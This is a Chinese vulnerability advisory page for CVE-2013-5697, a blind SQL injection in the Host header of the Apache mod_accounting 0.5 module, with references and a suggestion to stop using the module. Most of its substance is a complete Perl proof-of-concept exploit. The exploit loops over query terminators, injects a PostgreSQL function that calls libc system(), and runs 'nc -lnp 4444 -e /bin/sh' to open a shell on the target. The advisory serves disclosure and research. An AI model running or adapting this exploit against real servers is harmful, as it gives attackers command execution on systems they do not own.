Apache 'mod_accounting'模块SQL注入漏洞(CVE-2013-5697)

漏洞版本:

mod_accounting 0.5

漏洞描述:

BUGTRAQ  ID: 62677

CVE ID: CVE-2013-5697



mod_accounting是Apache 1.3.x上的流量计费模块,该模块使用数据记录流量,支持的数据库类型包括MySQL及PostgreSQL。



mod_accounting 0.5模块在Host报文头中存在SQL注入漏洞,攻击者可利用此漏洞破坏应用,执行未授权数据库操作。该漏洞源于用户提供的HTTP报文头未经过滤即用在查询内。该模块使用了简单的字符串串联来修改已定义查询内的占位符,然后再发送到数据库内。该代码位于mod_accounting.c内。
<* 参考
http://packetstormsecurity.com/files/123408/mod_accounting-0.5-Blind-SQL-Injection.html
http://sebug.net/appdir/Apache
*>

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. #!/usr/bin/perl
  2. # PoC of blind SQL injection in the mod_accounting/0.5 Apache module
  3. # Injection can occur via the Host header
  4. # As the injection occurs in a user defined insert statement a bit of trial
  5. and error is required
  6. # Database operations occurs asyncronous to page response so timing attacks
  7. wont work
  8. # This one is completely blind
  9. # DB can be mysql or postgres, this PoC only covers postgres
  10. # PoC executes netcat to listen on port 4444 (requires dba privileges)
  11. use IO::Socket::INET;
  12.  
  13. print"#----------------------------------------------#\n";
  14. print"| mod_accounting/0.5 PoC exploit by \ () Wireghoul |\n";
  15. print"| www.justanotherhacker.com |\n";
  16. print"#----------Command execution via SQLi----------#\n";
  17. print"[*] Enumerating blind injection vectors:\n";
  18.  
  19. my@endings=("'));",'"));',"));","');",'");',");","';",'";',";");
  20. # These should terminate most insert statements
  21. #my @endings = ( "');" );
  22. my $shell ='nc -lnp 4444 -e /bin/sh';
  23. my $cnt =0;
  24. my $content ="CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
  25. '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
  26. foreach $end (@endings){
  27. $cnt++;
  28. my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]")ordie"Unable to
  29. connect to $ARGV[0]:$ARGV[1]: $!\n";
  30. my $str ="GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content --
  31. \r\n\r\n";# from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; --
  32. \r\n\r\n";
  33. print "[-]Trying $end\n";
  34. print $sock $str;
  35. #print "Sent $end\n";
  36. close ($sock);
  37. }
  38. print "[*]Done, remote server should have executed $shell\n";

Sebug安全建议:

临时解决方法:



该模块已经不再提供支持,可以根据需要,停止使用该模块。



厂商补丁:



mod_accounting

--------------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:



http://sourceforge.net/projects/mod-acct/files/

你可能感兴趣的:(apache)

  • flink-connector-jdbc扩展国产达梦数据库 炸地瓜 flink数据库大数据
    下载flink-connector-jdbc源码gitclonehttps://github.com/apache/flink-connector-jdbc.git增加达梦数据库支持在org.apache.flink.connector.jdbc.databases创建dm包在dm.dialect中创建DmDialect、DmDialectFactory、DmRowConverterDmDiale
  • Flink介绍与安装 叶域 大数据flinkflink大数据
    ApacheFlink是一个在有界数据流和无界数据流上进行有状态计算分布式处理引擎和框架。Flink设计旨在所有常见的集群环境中运行,以任意规模和内存级速度执行计算。一、主要特点和功能1.实时流处理:低延迟:Flink能够以亚秒级的延迟处理数据流,非常适合对时间敏感的应用,如实时分析、监控和告警系统。状态管理:Flink提供了对状态的内置支持,使得开发有状态的流式处理应用变得容易,如窗口操作、复杂
  • kafka_exporter服务安装并启动 风中凌乱 监控服务kafkaprometheus
    kafka_exporter服务安装并启动1、介绍2、下载kafka_exporter3、解压缩文件4、启动kafka_exporter服务1、介绍kafka_exporter是一个用于监控ApacheKafka集群的开源工具,它是由Prometheus社区维护的一个官方Exporter。该工具通过连接到Kafka集群并执行各种查询来收集关于Kafka集群的指标,并将这些指标暴露给Promethe
  • Windows PC上创建大数据职业技能竞赛实验环境之六--Flume、Kafka和Flink编程 liu9ang 大数据平台hadoopkafkaflinkredis
    1Flume参看日志采集工具Flume的安装与使用方法_厦大数据库实验室博客(xmu.edu.cn)。查看Flume安装root@client1:~#flume-ngversionFlume1.7.0Sourcecoderepository:https://git-wip-us.apache.org/repos/asf/flume.gitRevision:511d868555dd4d16e6ce4
  • Windows下载安装测试 Kafka ,并在SpringBoot上集成,一步到位简单Demo Kashinhu kafkaspringbootkafka
    Windows下载安装Kafka并在SpringBoot上集成一:下载并安装Kafka1,下载kafka安装包ApacheKafka正在上传…重新上传取消注意:kafka的运行需要依赖zookeeper,但是2.8.0以后的版本内置了zookeeper.jar文件,不需要单独安装zookeeper。2,解压并安装配置解压到D:\kafka_2.12-3.2.3解压完成后打开D:\kafka_2.1
  • 【Kafka】Kafka4.0在windows上启动 丑过三八线 kafkawindows分布式
    Kafka4.0在windows上启动单机版Windows上安装Kafka4.0安装JDK启动格式化日志目录启动服务测试创建topic启动一个消费端启动一个生产端测试生产端的操作消费端的操作Windows上安装Kafka4.0首先下载安装编译好的安装包,下载地址:https://kafka.apache.org/downloads。这里之所以称他为4.0,是因为网站上那样写的。安装包的版本标注好像
  • Django 生产环境静态文件处理 换个网名有点难 pythondjango
    `pythonmanage.pycollectstatic`是Django提供的一个非常重要的管理命令,用于将项目中的静态文件收集到一个指定的目录中。这在部署Django项目时尤其重要,因为静态文件需要被Web服务器(如Nginx或Apache)提供服务,而不是通过Django提供。命令详解1.基本功能`collectstatic`命令的主要功能是将项目中所有应用的静态文件以及`STATICFIL
  • Buffer overFolw---Kryo序列化出现缓冲区溢出的问题解决 Matrix70 #spark大数据分布式
    问题:由于我的数据量太大,我设置批次为10000万,50w数据大概有400M左右,然后进行spark数据处理时候报错为org.apache.spark.SparkException:Kryoserializationfailed:BufferoverFolw.Available:0,rquired58900977,Toavoidthis,increasespark.kryoserializer.b
  • Spring AOP面向切面编程实现日志功能 PXM的算法星球 Java后端spring单元测试java
    首先我们引入日志slf4j相关依赖org.slf4jslf4j-api2.0.9org.apache.logging.log4jlog4j-slf4j2-impl2.20.0org.apache.logging.log4jlog4j-core2.20.0再引入spring-aop依赖org.springframeworkspring-aop5.3.23为了方便编码,lombok也是必不可少的org
  • 中间件漏洞--tomcat 夜行者~ 安全tomcat中间件java
    1.后台地址泄露解决办法:1).删除TOMCAT_HOME/webapps/docs、examples、manager、ROOT、host-manager2).编辑TOMCAT_HOME/web.xml,修改org.apache.catalina.servlets.DefaultServlet下的初始化参数listings的默认值,改成(或增加)为:false2.中间件及版本信息泄露解决办法进入a
  • SpringBoot3 集成 Shiro Sweet锦 Javaspringboot后端java
    ApacheShiro是一个强大且易用的Java安全框架,提供了身份验证、授权、密码学和会话管理等功能。它被广泛用于保护各种类型的应用程序,包括Web应用、桌面应用、RESTful服务、移动应用和大型企业级应用。ApacheShiro没有SpringSecurity那么多晦涩的概念和术语,其原理非常清晰易懂,也非常容易集成到自己的项目中。SpringBoot2.x已于去年底Endoflife,升级
  • Apache Flink 2.0.0: 实时数据处理的新纪元 flink大数据
    昨天天,Flink开发团队骄傲地宣布ApacheFlink2.0.0正式发布!这是Flink2.x系列的首个版本,也是自九年前Flink1.0发布以来的首次重大更新。这个版本凝聚了社区两年来精心筹备与协作的成果,标志着Flink发展开启了新篇章。在这个版本中,165位贡献者齐聚一堂,完成了25项Flink改进提案(FLIP),解决了367个问题。我们衷心感谢所有贡献者为这个里程碑版本付出的宝贵努力
  • flink之SQL入门 panxuej_shenx
    SQL部分学习TableAPI的特点TableAPI和SQL都是ApacheFlink中高等级的分析API,SQL所具备的特点TableAPI也都具有,如下:声明式-用户只关心做什么,不用关心怎么做;高性能-支持查询优化,可以获取最好的执行性能;流批统一-相同的统计逻辑,既可以流模式运行,也可以批模式运行;标准稳定-语义遵循SQL标准,语法语义明确,不易变动。当然除了SQL的特性,因为TableA
  • 记录使用Python从RocketMQ中实现数据消费及推送 搬运工- rocketmq
    背景:工作需要使用Python3从rocketmq的队列里读取数据,相关文档也比较少,找到rocketmqpython库在GitHub地址:https://github.com/apache/rocketmq-client-python官网表示基于rocketmq-client-cpp,支持Linux和macOS系统系统环境:1、centos72、python33、RocketMQ4.9.1安装R
  • 数据湖和Apache Iceberg,Apache Hudi,Delta Lake 西土城计划 apachebigdata大数据
    1什么是数据湖?数据湖这个词目前已经流行开来,逐步被数据相关的从业者接受,可能还有很多人不太清楚它和Hadoop,Hive,Spark这些大数据系统的区别,简单说数据湖是个业务概念,主要是为了区别传统数仓这个概念的(传统数仓的定义:datawarehouse,是用于报告和数据分析的系统,被认为是商业智能的核心组件)。为什么说是“传统数仓”,因为Hadoop于2006年诞生至今已有10多年了,在这期
  • Apache Iceberg 解析,一文了解Iceberg定义、应用及未来发展 镜舟科技 apacheIcebergStarRocks元数据数据湖湖仓一体数据分析
    什么是Iceberg?ApacheIceberg是一种开源的表格式(TableFormat),专为超大规模数据分析场景设计,通过标准化数据存储规范与访问协议,解决了传统数据湖在元数据管理、事务控制、查询性能等方面的核心痛点。以下从六个维度全面解析其技术原理、应用场景与最佳实践。一、为什么需要新的表格式?传统数据湖面临的痛点数据治理与管理能力不足:传统数据湖在数据治理和管理方面存在明显短板,缺乏严格
  • Shiro qq_41701460 java
    Shiro简介Shiro概述ApacheShiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理,可用于保护任何应用程序的安全。Shiro提供了应用程序安全性API来执行以下方面:1)身份验证:证明用户身份,通常称为用户"登录";2)授权:访问控制;3)密码术:保护或隐藏数据以防窥视;4)会话管理:每个用户的时间敏感状态。上述四个方面也被称为应用程序安全性的四个基
  • Java动态生成Word终极指南:poi-tl与Aspose.Words性能对比及选型建议 天机️灵韵 开源项目编程语言vscodeJavaword模板
    在Java中实现复杂文档生成(如合同、报表)时,poi-tl、Aspose.Words和docx4j是三个主流的模板技术方案。以下是它们的核心对比和选型建议:1.poi-tl(基于ApachePOI的模板引擎)定位:轻量级开源库,基于ApachePOI封装,简化模板操作。核心优势:模板语法灵活:通过{{@var}}、{{?section}}等标签实现文本、表格、列表、图片的动态插入。代码简洁:相比
  • springmvc配置dubbo两种方式 饿饿好饿 javadubbojava-zookeeperzookeeperlinuxredis
    springmvc配置dubbo两种方式dubbo+zookeeper在读本文前建议先掌握dubbo的基本知识dubbo官网地址:http://dubbo.apache.org/zh/主要步骤:将服务提供者注册到注册中心,暴露服务,消费者引用准备1、在服务器或者本地搭建好zookeeper,启动zoookeeper2、在服务器或者本地搭建好dubbo-admin,启动dubboXML方式配置配置提
  • WX小程序 Angelyb Java后端小程序
    下载packagecom.sky.utils;importcom.alibaba.fastjson.JSONObject;importorg.apache.http.NameValuePair;importorg.apache.http.client.config.RequestConfig;importorg.apache.http.client.entity.UrlEncodedFormEnt
  • Invalid byte tag in constant pool: 19 Johnny_Cheung 采坑记录javaeclipsejvm
    目前在用eclipse启动老项目的时候遇到一个报错,导致tomcat不来,报org.aspectj.apache.bcel.classfile.ClassFormatException:Invalidbytetaginconstantpool:19atorg.aspectj.apache.bcel.classfile.Constant.readConstant(Constant.java:133)
  • Spring Cloud Stream:打造强大的微服务事件驱动架构 Java爱好狂. java开发语言
    随着云计算、微服务和大数据技术的快速发展,构建可扩展、高性能和弹性的应用程序变得越来越重要。为了满足这些要求,许多开发人员转向了事件驱动架构,它允许应用程序通过基于事件的方式相互通信,从而提高了系统的响应速度和伸缩性。在这个背景下,SpringCloudStream应运而生,它是一个用于构建基于事件驱动的微服务应用程序的框架,可以与现有的消息中间件(如ApacheKafka和RabbitMQ)无缝
  • 基于Zookeeper的微服务配置管理与灰度发布实战指南 Vic10101 zookeeper微服务分布式
    引言在分布式系统中,服务注册与发现、配置管理以及平滑发布是保障系统高可用性的关键。ApacheZookeeper作为一款成熟的分布式协调服务,结合SpringCloud生态,能够有效解决这些挑战。本文将深入探讨Zookeeper的核心配置参数、服务注册机制,并通过一个电商系统的灰度发布案例,展示如何实现流量的平滑迁移。第一部分:Zookeeper核心配置解析1.1基础连接配置spring.clou
  • 1.Kafka介绍 小黑要上天 Kafkakafka分布式
    1.关于KafkaKafka是由Apache软件基金会开发的一个开源流处理平台,由Scala和Java编写。Kafka是一种高吞吐量的分布式发布订阅消息系统,它可以处理消费组在网站中的所有动作流数据。这种动作(网页浏览,搜索,注册、订单和其它用户的行动)是在现代网络上的许多社会功能的一个关键因素。这些数据通常是由于吞吐量的要求,通过处理日志和日志聚合来解决。提到Kafka(2.8+版本之前,需使用
  • Kafka 4.0 发布:KRaft 替代 Zookeeper、新一代重平衡协议、点对点消息模型、移除旧协议 API 野生技术架构师 kafkazookeeper分布式
    KRaft全面替代ZooKeeperApacheKafka4.0是一个重要的里程碑,标志着第一个完全无需ApacheZooKeeper®运行的主要版本。通过默认运行在KRaft模式下,Kafka简化了部署和管理,消除了维护单独ZooKeeper集群的复杂性。这一变化显著降低了运营开销,增强了可扩展性,并简化了管理任务。旧架构痛点回顾在Kafka3.x及更早版本中,ZooKeeper(ZK)是元数据
  • Kafka3.0版本来了,我们应该注意到什么: 能断_nd kafkajava分布式
    ApacheKafka是一个分布式开源流平台,被广泛应用于各大互联网公司。Kafka设计之初被用于消息队列,自2011年由LinkedIn开源以来,Kafka迅速从消息队列演变为成熟的事件流处理平台。Kafka具有四个核心API,借助这些API,Kafka可以用于以下两大类应用:建立实时流数据管道,可靠地进行数据传输,在系统或应用程序之间获取数据。构建实时流媒体应用程序,以改变系统或应用程序之间的
  • Apache Kafka 4.0正式发布,首个默认KRaft模式运行,移除单独维护Zookeeper降低复杂性,从零基础到精通,收藏这篇就够了! Python_chichi 职业发展科技大模型apachekafkazookeeper
    .markdown-bodypre,.markdown-bodypre>code.hljs{color:#333;background:#f8f8f8}.hljs-comment,.hljs-quote{color:#998;font-style:italic}.hljs-keyword,.hljs-selector-tag,.hljs-subst{color:#333;font-weight:7
  • Kafka 4.0 发布,彻底移除 ZooKeeper! 野生技术架构师 kafkazookeeper分布式
    最近ApacheKafka4.0版本发布,这是Kafka的一个重要里程碑。Kafka移除ZooKeeper早在几年前就开始准备,4.0版本是第一个可以完全不使用ZooKeeper的版本。Kafka4.0默认允许在KRaft模式下,大大简化了集群的部署和管理,消除了集成ZooKeeper的复杂性。在KRaft模式下,一些配置、指标和功能发生了不小的变化,今天我们来看一下都有哪些改变。删除了密码编码相
  • SpringBoot使用Websocket技术实现聊天功能--后端部分(三) oct1025 Ideawebsocketspringboot后端
    所需依赖:javax.websocketjavax.websocket-api1.1providedorg.springframework.bootspring-boot-starter-freemarkerorg.springframework.bootspring-boot-starter-websocket-->org.apache.tomcat.embed-->tomcat-embed-w
  • Apache Paimon:开启实时湖仓存储新时代 大数据AI智能圈 大数据apachepaimon实时湖仓大数据
    ApachePaimon:开启实时湖仓存储新时代前言ApachePaimon前言在当今数字化浪潮汹涌澎湃的时代,数据已成为企业最为宝贵的资产之一。如何高效地处理、存储和利用这些海量数据,成为了企业在激烈竞争中脱颖而出的关键。而在数据处理的广阔领域中,ApachePaimon宛如一颗冉冉升起的新星,以其强大的功能和创新的技术,为实时湖仓存储带来了全新的变革。随着企业业务的不断发展和数据量的急剧增长,
  • java封装继承多态等 麦田的设计者 javaeclipsejvmcencapsulatopn
           最近一段时间看了很多的视频却忘记总结了,现在只能想到什么写什么了,希望能起到一个回忆巩固的作用。     1、final关键字       译为:最终的        &
  • F5与集群的区别 bijian1013 weblogic集群F5
            http请求配置不是通过集群,而是F5;集群是weblogic容器的,如果是ejb接口是通过集群。         F5同集群的差别,主要还是会话复制的问题,F5一把是分发http请求用的,因为http都是无状态的服务,无需关注会话问题,类似
  • LeetCode[Math] - #7 Reverse Integer Cwind java题解MathLeetCodeAlgorithm
    原题链接:#7 Reverse Integer   要求: 按位反转输入的数字 例1: 输入 x = 123, 返回 321 例2: 输入 x = -123, 返回 -321   难度:简单   分析: 对于一般情况,首先保存输入数字的符号,然后每次取输入的末位(x%10)作为输出的高位(result = result*10 + x%10)即可。但
  • BufferedOutputStream 周凡杨
         首先说一下这个大批量,是指有上千万的数据量。      例子:      有一张短信历史表,其数据有上千万条数据,要进行数据备份到文本文件,就是执行如下SQL然后将结果集写入到文件中!      select t.msisd
  • linux下模拟按键输入和鼠标 被触发 linux
    查看/dev/input/eventX是什么类型的事件, cat /proc/bus/input/devices 设备有着自己特殊的按键键码,我需要将一些标准的按键,比如0-9,X-Z等模拟成标准按键,比如KEY_0,KEY-Z等,所以需要用到按键 模拟,具体方法就是操作/dev/input/event1文件,向它写入个input_event结构体就可以模拟按键的输入了。 linux/in
  • ContentProvider初体验 肆无忌惮_ ContentProvider
    ContentProvider在安卓开发中非常重要。与Activity,Service,BroadcastReceiver并称安卓组件四大天王。 在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面,这里面的文件默认都是私有的,别的程序无法访问。 如果QQ游戏想访问手机QQ的帐号信息一键登录,那么就需要使用内容提供者COnte
  • 关于Spring MVC项目(maven)中通过fileupload上传文件 843977358 mybatisspring mvc修改头像上传文件upload
    Spring MVC 中通过fileupload上传文件,其中项目使用maven管理。   1.上传文件首先需要的是导入相关支持jar包:commons-fileupload.jar,commons-io.jar 因为我是用的maven管理项目,所以要在pom文件中配置(每个人的jar包位置根据实际情况定) <!-- 文件上传 start by zhangyd-c --&g
  • 使用svnkit api,纯java操作svn,实现svn提交,更新等操作 aigo svnkit
     原文:http://blog.csdn.net/hardwin/article/details/7963318   import java.io.File; import org.apache.log4j.Logger; import org.tmatesoft.svn.core.SVNCommitInfo; import org.tmateso
  • 对比浏览器,casperjs,httpclient的Header信息 alleni123 爬虫crawlerheader
    @Override protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { String type=req.getParameter("type"); Enumeration es=re
  • java.io操作 DataInputStream和DataOutputStream基本数据流 百合不是茶 java
    1,java中如果不保存整个对象,只保存类中的属性,那么我们可以使用本篇文章中的方法,如果要保存整个对象  先将类实例化  后面的文章将详细写到     2,DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
  • 车辆保险理赔案例 bijian1013 车险
    理赔案例: 一货运车,运输公司为车辆购买了机动车商业险和交强险,也买了安全生产责任险,运输一车烟花爆竹,在行驶途中发生爆炸,出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧,针对这几种情况,该如何赔付。 赔付建议和方案: 客户所买交强险在这里不起作用,因为交强险的赔付前提是:“机动车发生道路交通意外事故”; 如果是交通意外事故引发的爆炸,则优先适用交强险条款进行赔付,不足的部分由商业
  • 学习Spring必学的Java基础知识(5)—注解 bijian1013 javaspring
            文章来源:http://www.iteye.com/topic/1123823,整理在我的博客有两个目的:一个是原文确实很不错,通俗易懂,督促自已将博主的这一系列关于Spring文章都学完;另一个原因是为免原文被博主删除,在此记录,方便以后查找阅读。           有必要对
  • 【Struts2一】Struts2 Hello World bit1129 Hello world
    Struts2 Hello World应用的基本步骤 创建Struts2的Hello World应用,包括如下几步: 1.配置web.xml 2.创建Action 3.创建struts.xml,配置Action 4.启动web server,通过浏览器访问   配置web.xml <?xml version="1.0" encoding="
  • 【Avro二】Avro RPC框架 bit1129 rpc
    1. Avro RPC简介 1.1. RPC RPC逻辑上分为二层,一是传输层,负责网络通信;二是协议层,将数据按照一定协议格式打包和解包 从序列化方式来看,Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架,都能跨语言,性能优秀,数据精简,但是Avro的动态模式(不用生成代码,而且性能很好)这个特点让人非常喜欢,比较适合R
  • lua set get cookie ronin47 lua cookie
    lua: local access_token = ngx.var.cookie_SGAccessToken if access_token then ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000" end
  • java-打印不大于N的质数 bylijinnan java
    public class PrimeNumber { /** * 寻找不大于N的质数 */ public static void main(String[] args) { int n=100; PrimeNumber pn=new PrimeNumber(); pn.printPrimeNumber(n); System.out.print
  • Spring源码学习-PropertyPlaceholderHelper bylijinnan javaspring
    今天在看Spring 3.0.0.RELEASE的源码,发现PropertyPlaceholderHelper的一个bug 当时觉得奇怪,上网一搜,果然是个bug,不过早就有人发现了,且已经修复: 详见: http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug
  • [逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么? comsci 拓扑
       如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢?    是否可以形成一种新的模糊语言识别和处理模型呢?  大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
  • ITEYE 都换百度推广了 cuisuqiang GoogleAdSense百度推广广告外快
    以前ITEYE的广告都是谷歌的Google AdSense,现在都换成百度推广了。   为什么个人博客设置里面还是Google AdSense呢?   都知道Google AdSense不好申请,这在ITEYE上也不是讨论了一两天了,强烈建议ITEYE换掉Google AdSense。至少,用一个好申请的吧。   什么时候能从ITEYE上来点外快,哪怕少点
  • 新浪微博技术架构分析 dalan_123 新浪微博架构
    新浪微博在短短一年时间内从零发展到五千万用户,我们的基层架构也发展了几个版本。第一版就是是非常快的,我们可以非常快的实现我们的模块。我们看一下技术特点,微博这个产品从架构上来分析,它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式,假如说我们一个明星用户他有10万个粉丝,那就是说用户发表一条微博的时候,我们把这个微博消息攒成10万份,这样就是很简单了,第一版的架构实际上就是这两行字。第
  • 玩转ARP攻击 dcj3sjt126com r
    我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。 网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。 ARP也是如此。 以下讨论的机子有 一个要攻击的机子:10.5.4.178 硬件地址:52:54:4C:98
  • PHP编码规范 dcj3sjt126com 编码规范
    一、文件格式 1. 对于只含有 php 代码的文件,我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如:<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果,尽量使用四个空格,禁止使用制表符TAB,因为这样能够保证有跨客户端编程器软件的灵活性。例
  • linux 脱机管理(nohup) eksliang linux nohupnohup
    脱机管理 nohup 转载请出自出处:http://eksliang.iteye.com/blog/2166699 nohup可以让你在脱机或者注销系统后,还能够让工作继续进行。他的语法如下 nohup [命令与参数] --在终端机前台工作 nohup [命令与参数] & --在终端机后台工作   但是这个命令需要注意的是,nohup并不支持bash的内置命令,所
  • BusinessObjects Enterprise Java SDK greemranqq javaBOSAPCrystal Reports
    最近项目用到oracle_ADF  从SAP/BO 上调用 水晶报表,资料比较少,我做一个简单的分享,给和我一样的新手 提供更多的便利。   首先,我是尝试用JAVA JSP 去访问的。   官方API:http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
  • 系统负载剧变下的管控策略 iamzhongyong 高并发
    假如目前的系统有100台机器,能够支撑每天1亿的点击量(这个就简单比喻一下),然后系统流量剧变了要,我如何应对,系统有那些策略可以处理,这里总结了一下之前的一些做法。 1、水平扩展 这个最容易理解,加机器,这样的话对于系统刚刚开始的伸缩性设计要求比较高,能够非常灵活的添加机器,来应对流量的变化。 2、系统分组 假如系统服务的业务不同,有优先级高的,有优先级低的,那就让不同的业务调用提前分组
  • BitTorrent DHT 协议中文翻译 justjavac bit
    前言 做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent},因此把 DHT 协议重新看了一遍。 BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
  • Ubuntu下Java环境的搭建 macroli java工作ubuntu
    配置命令:   $sudo apt-get install ubuntu-restricted-extras   再运行如下命令:   $sudo apt-get install sun-java6-jdk   待安装完毕后选择默认Java.   $sudo update- alternatives --config java   安装过程提示选择,输入“2”即可,然后按回车键确定。
  • js字符串转日期(兼容IE所有版本) qiaolevip TODateStringIE
    /** * 字符串转时间(yyyy-MM-dd HH:mm:ss) * result (分钟) */ stringToDate : function(fDate){ var fullDate = fDate.split(" ")[0].split("-"); var fullTime = fDate.split("
  • 【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析 superlxw1234 sql数据挖掘关联规则
    关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。 关联规则揭示了数据项间的未知的依赖关系,根据所挖掘的关联关系,可以从一个数据对象的信息来推断另一个数据对象的信息。 例如购物篮分析。牛奶 ⇒ 面包 [支持度:3%,置信度:40%] 支持度3%:意味3%顾客同时购买牛奶和面包。 置信度40%:意味购买牛奶的顾客40%也购买面包。 规则的支持度和置信度是两个规则兴
  • Spring 5.0 的系统需求,期待你的反馈 wiselyman spring
                   Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。          Spring 5.0的特性计划还在工作中,请保持关注,所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。  
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他